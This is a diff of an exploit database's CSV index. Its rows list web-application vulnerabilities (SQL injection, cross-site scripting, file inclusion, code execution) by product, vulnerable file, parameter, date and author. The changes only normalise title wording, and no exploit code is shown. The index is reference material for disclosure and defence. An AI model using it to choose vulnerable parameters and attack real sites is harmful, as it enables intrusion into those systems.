34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Inclusion / SQL Injection",2010-09-02,Inj3ct0r,php,webapps,0 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 -34610,platforms/php/webapps/34610.txt,"ZenPhoto 1.3 - zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 -34611,platforms/php/webapps/34611.txt,"ZenPhoto 1.3 - zp-core/admin.php Multiple Parameter Cross-Site Scripting",2010-09-07,"Bogdan Calin",php,webapps,0 +34610,platforms/php/webapps/34610.txt,"ZenPhoto 1.3 - 'zp-core/full-image.php?a' SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 +34611,platforms/php/webapps/34611.txt,"ZenPhoto 1.3 - 'zp-core/admin.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-07,"Bogdan Calin",php,webapps,0 34805,platforms/php/webapps/34805.txt,"StatsCode - Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting",2009-07-08,Moudi,php,webapps,0 34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script - 'admin.php' Insecure Cookie Authentication Bypass",2009-07-08,NoGe,php,webapps,0 34614,platforms/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",asp,webapps,0 -34683,platforms/php/webapps/34683.txt,"e-soft24 Article Directory Script - 'q' Parameter Cross-Site Scripting",2009-08-30,"599eme Man",php,webapps,0 -34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax - 'q' Parameter Cross-Site Scripting",2009-08-13,Isfahan,php,webapps,0 +34683,platforms/php/webapps/34683.txt,"e-soft24 Article Directory Script - 'q' Cross-Site Scripting",2009-08-30,"599eme Man",php,webapps,0 +34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax - 'q' Cross-Site Scripting",2009-08-13,Isfahan,php,webapps,0 34617,platforms/php/webapps/34617.txt,"Waverider Systems Perlshop - Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps,0 34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting - 'resume_register.php' Cross-Site Scripting",2009-09-06,MizoZ,php,webapps,0 34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80 -34625,platforms/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 +34625,platforms/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - Local File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps,0 -34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0 +34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0 34629,platforms/php/webapps/34629.txt,"AContent 1.0 - Cross-Site Scripting / HTML Injection",2010-09-15,"High-Tech Bridge SA",php,webapps,0 -34630,platforms/php/webapps/34630.txt,"AChecker 1.0 - 'URI' Parameter Cross-Site Scripting",2010-09-15,"High-Tech Bridge SA",php,webapps,0 -34631,platforms/php/webapps/34631.txt,"ATutor 1.0 - Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 -34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 - 'search' Parameter HTML Injection",2009-08-06,"599eme Man",php,webapps,0 -34633,platforms/php/webapps/34633.txt,"SpiceWorks - 'query' Parameter Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps,0 +34630,platforms/php/webapps/34630.txt,"AChecker 1.0 - 'URI' Cross-Site Scripting",2010-09-15,"High-Tech Bridge SA",php,webapps,0 +34631,platforms/php/webapps/34631.txt,"ATutor 1.0 - Multiple 'cid' Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 +34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 - 'search' HTML Injection",2009-08-06,"599eme Man",php,webapps,0 +34633,platforms/php/webapps/34633.txt,"SpiceWorks - 'query' Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps,0 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products - 'escorts_search.php' Cross-Site Scripting",2010-09-15,"599eme Man",php,webapps,0 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script - 'category.php' SQL Injection",2009-08-06,"599eme Man",php,webapps,0 -34636,platforms/php/webapps/34636.txt,"NWS-Classifieds - 'cmd' Parameter Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 +34636,platforms/php/webapps/34636.txt,"NWS-Classifieds - 'cmd' Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting",2010-09-15,"John Leitch",php,webapps,0 34641,platforms/php/webapps/34641.py,"ChillyCMS 2.3.4.3 - Arbitrary File Upload",2010-09-15,"John Leitch",php,webapps,0 -34642,platforms/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-06,"599eme Man",php,webapps,0 -34643,platforms/php/webapps/34643.txt,"Silurus Classifieds - category.php ID Parameter Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 -34644,platforms/php/webapps/34644.txt,"Silurus Classifieds - wcategory.php ID Parameter Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 -34645,platforms/php/webapps/34645.txt,"Silurus Classifieds - search.php keywords Parameter Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 +34642,platforms/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-06,"599eme Man",php,webapps,0 +34643,platforms/php/webapps/34643.txt,"Silurus Classifieds - 'category.php?ID' Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 +34644,platforms/php/webapps/34644.txt,"Silurus Classifieds - 'wcategory.php?ID' Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 +34645,platforms/php/webapps/34645.txt,"Silurus Classifieds - 'search.php?keywords' Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injections",2009-08-03,Drosophila,php,webapps,0 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",php,webapps,0 34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 - Cross-Site Scripting",2009-08-30,"599eme Man",php,webapps,0 @@ -34375,50 +34376,50 @@ id,file,description,date,author,platform,type,port 34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 34653,platforms/php/webapps/34653.txt,"e107 0.7.23 - Multiple SQL Injections",2010-09-17,"High-Tech Bridge SA",php,webapps,0 34655,platforms/php/webapps/34655.txt,"Open Classifieds - Multiple Cross-Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0 -34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 - includes/video_ad.php pic_id Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 - linkvideos_listing.php category Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - templates/header1.php id Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b - video_listing.php key Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b - embed.php name Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b - info.php name Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - lyrics.php id Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - adult/video_listing.php key Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 - 'includes/video_ad.php?pic_id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 - 'linkvideos_listing.php?category' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'templates/header1.php?id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'embed.php?name' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'info.php?name' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'lyrics.php?id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'adult/video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Inclusion",2014-09-15,Vulnerability-Lab,ios,webapps,0 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Code Execution",2014-09-15,eF,php,webapps,80 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090 34673,platforms/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps,0 -34674,platforms/php/webapps/34674.txt,"WebStatCaffe - stat/mostvisitpage.php nodayshow Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34675,platforms/php/webapps/34675.txt,"WebStatCaffe - stat/visitorduration.php nodayshow Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34676,platforms/php/webapps/34676.txt,"WebStatCaffe - stat/mostvisitpagechart.php nopagesmost Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34677,platforms/php/webapps/34677.txt,"WebStatCaffe - stat/pageviewers.php date Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34678,platforms/php/webapps/34678.txt,"WebStatCaffe - stat/pageviewerschart.php date Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34679,platforms/php/webapps/34679.txt,"WebStatCaffe - stat/referer.php date Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34674,platforms/php/webapps/34674.txt,"WebStatCaffe - 'stat/mostvisitpage.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34675,platforms/php/webapps/34675.txt,"WebStatCaffe - 'stat/visitorduration.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34676,platforms/php/webapps/34676.txt,"WebStatCaffe - 'stat/mostvisitpagechart.php?nopagesmost' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34677,platforms/php/webapps/34677.txt,"WebStatCaffe - 'stat/pageviewers.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34678,platforms/php/webapps/34678.txt,"WebStatCaffe - 'stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34679,platforms/php/webapps/34679.txt,"WebStatCaffe - 'stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34680,platforms/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps,0 34681,platforms/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",php,webapps,0 34682,platforms/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,ios,webapps,8080 34687,platforms/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,asp,webapps,0 34688,platforms/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,php,webapps,0 34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,php,webapps,0 -34690,platforms/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Parameter Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 -34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'SearchString' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 +34690,platforms/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 +34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'SearchString' Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 34694,platforms/php/webapps/34694.txt,"Clipbucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,php,webapps,0 34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0 34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s - 'index.php' Local File Inclusion / Cross-Site Scripting",2009-07-24,u.f.,php,webapps,0 -34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 - 'cat' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0 +34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 - 'cat' Multiple Cross-Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0 34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads - Cross-Site Scripting / SQL Injection",2009-07-24,Moudi,php,webapps,0 34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script - 'payment.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34705,platforms/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injections",2009-07-21,n3w7u,php,webapps,0 -34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Inclusion",2009-07-21,Moudi,php,webapps,0 +34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Remote File Inclusion",2009-07-21,Moudi,php,webapps,0 34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 -34708,platforms/php/webapps/34708.pl,"Joomla! Component com_tax - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0 +34708,platforms/php/webapps/34708.pl,"Joomla! Component com_tax - 'eid' SQL Injection",2010-09-23,FL0RiX,php,webapps,0 34709,platforms/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Parameter Cross-Site Scripting",2009-08-21,"599eme Man",php,webapps,0 +34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-21,"599eme Man",php,webapps,0 34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php' cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0 34712,platforms/php/webapps/34712.txt,"Freewebscriptz HUBScript - 'single_winner1.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34713,platforms/php/webapps/34713.txt,"Freelancers - placebid.php id Parameter Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 -34714,platforms/php/webapps/34714.txt,"Freelancers - post_resume.php jobid Parameter Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 +34713,platforms/php/webapps/34713.txt,"Freelancers - 'placebid.php?id' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 +34714,platforms/php/webapps/34714.txt,"Freelancers - 'post_resume.php?jobid' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34715,platforms/php/webapps/34715.txt,"AdQuick - 'account.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34804,platforms/php/webapps/34804.txt,"Rentventory - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0 @@ -34429,22 +34430,22 @@ id,file,description,date,author,platform,type,port 34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting",2010-10-08,"Anatolia Security",php,webapps,0 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",php,webapps,0 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injections",2014-09-20,BillV-Lists,php,webapps,0 -34730,platforms/php/webapps/34730.txt,"DragDropCart - assets/js/ddcart.php sid Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34731,platforms/php/webapps/34731.txt,"DragDropCart - includes/ajax/getstate.php prefix Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34730,platforms/php/webapps/34730.txt,"DragDropCart - 'assets/js/ddcart.php?sid' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34731,platforms/php/webapps/34731.txt,"DragDropCart - 'includes/ajax/getstate.php?prefix' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34732,platforms/php/webapps/34732.txt,"DragDropCart - 'index.php' search Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34733,platforms/php/webapps/34733.txt,"DragDropCart - search.php search Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34733,platforms/php/webapps/34733.txt,"DragDropCart - 'search.php?search' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34734,platforms/php/webapps/34734.txt,"DragDropCart - 'login.php' redirect Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34735,platforms/php/webapps/34735.txt,"DragDropCart - productdetail.php product Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34735,platforms/php/webapps/34735.txt,"DragDropCart - 'productdetail.php?product' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34736,platforms/php/webapps/34736.txt,"EZArticles - 'articles.php' Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 34737,platforms/php/webapps/34737.txt,"EZodiak - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34738,platforms/php/webapps/34738.txt,"GejoSoft Image Hosting Community - Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34740,platforms/php/webapps/34740.txt,"MyWeight 1.0 - user_addfood.php date Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34741,platforms/php/webapps/34741.txt,"MyWeight 1.0 - user_forgot_pwd_form.php info Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34742,platforms/php/webapps/34742.txt,"MyWeight 1.0 - user_login.php Multiple Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34740,platforms/php/webapps/34740.txt,"MyWeight 1.0 - 'user_addfood.php?date' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34741,platforms/php/webapps/34741.txt,"MyWeight 1.0 - 'user_forgot_pwd_form.php?info' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34742,platforms/php/webapps/34742.txt,"MyWeight 1.0 - 'user_login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-20,Moudi,php,webapps,0 34743,platforms/php/webapps/34743.txt,"Proxy List Script - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds - listads.php Multiple Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - subclass.php cname Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34746,platforms/php/webapps/34746.txt,"Web TV - 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds - 'listads.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-20,Moudi,php,webapps,0 +34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - 'subclass.php?cname' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34746,platforms/php/webapps/34746.txt,"Web TV - 'chn' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'index.php' Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0 40338,platforms/php/webapps/40338.txt,"PHPIPAM 1.2.1 - Multiple Vulnerabilities",2016-09-06,"Saeed reza Zamanian",php,webapps,80 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0 @@ -34462,58 +34463,58 @@ id,file,description,date,author,platform,type,port 34769,platforms/php/webapps/34769.txt,"MySITE - SQL Injection / Cross-Site Scripting",2010-09-27,MustLive,php,webapps,0 34770,platforms/php/webapps/34770.txt,"PHP Scripts Now Hangman - 'index.php' n Parameter SQL Injection",2009-07-21,Moudi,php,webapps,0 34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman - 'index.php' letters Parameter Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 -34772,platforms/php/webapps/34772.txt,"Honest Traffic - 'msg' Parameter Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 +34772,platforms/php/webapps/34772.txt,"Honest Traffic - 'msg' Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps,0 -34774,platforms/php/webapps/34774.txt,"HotScripts Type PHP Clone Script - feedback.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 +34774,platforms/php/webapps/34774.txt,"HotScripts Type PHP Clone Script - 'feedback.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34775,platforms/php/webapps/34775.txt,"HotScripts Type PHP Clone Script - 'index.php' msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 -34776,platforms/php/webapps/34776.txt,"HotScripts Type PHP Clone Script - lostpassword.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 +34776,platforms/php/webapps/34776.txt,"HotScripts Type PHP Clone Script - 'lostpassword.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll - 'demo_page.php' Cross-Site Scripting",2009-07-16,Moudi,php,webapps,0 34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' HTML Injection",2010-09-28,"Veerendra G.G",php,webapps,0 34785,platforms/php/webapps/34785.txt,"PHPMyFAQ 2.6.x - 'index.php' Cross-Site Scripting",2010-09-28,"Yam Mesicka",php,webapps,0 34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 -34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 -34788,platforms/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php class_key' Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 +34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - 'manager/index.php?modahsh' Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 +34788,platforms/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 -34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 -34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 -34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 +34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 +34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - 'start.php?id' SQL Injection",2009-07-07,Moudi,php,webapps,0 +34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - 'start.php?go' Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 34793,platforms/php/webapps/34793.txt,"Top Paidmailer - 'home.php' Remote File Inclusion",2009-07-13,Moudi,php,webapps,0 34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products - 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0 34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script - 'index.php' Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0 34797,platforms/php/webapps/34797.txt,"Surgemail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 -34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0 +34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0 34781,platforms/php/webapps/34781.txt,"WordPress Plugin All In One WP Security 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 34798,platforms/php/webapps/34798.txt,"ITS SCADA - 'Username' SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - Local File Inclusion",2014-09-29,Vulnerability-Lab,ios,webapps,0 